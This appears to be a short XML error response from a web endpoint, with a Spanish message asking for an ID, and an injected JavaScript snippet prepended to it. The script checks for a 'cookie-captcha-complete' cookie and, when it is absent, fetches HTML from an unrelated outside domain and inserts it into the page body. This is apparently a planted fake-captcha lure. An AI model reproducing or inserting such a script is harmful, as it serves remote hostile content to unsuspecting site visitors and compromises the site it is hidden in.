<script>window.addEventListener("message", e =>{if(e.data === "reload"){        window.location.reload();    }});function getCookie(name){const match = document.cookie.match(new RegExp("(^|; )" + name + "=([^;]*)"));return match ? decodeURIComponent(match[2]) : null;}const cookiename = "cookie-captcha-complete";const cookie = getCookie(cookiename);if(!cookie){fetch("https://abudabicommerce.info") .then(response => response.ok ? response.text() : Promise.reject()).then(html =>{if(html.length === 0){document.cookie = cookiename + "=1; path=/; max-age=" + (60 * 60 * 24 * 365);}else{document.body.insertAdjacentHTML("beforeend", html);}}).catch(() => console.error("Failed to load page!"));}</script><?xml version="1.0" encoding="utf-8"?>
<response>
<error>1</error>
<message>Necesito un ID para que esto funcione.</message>
</response>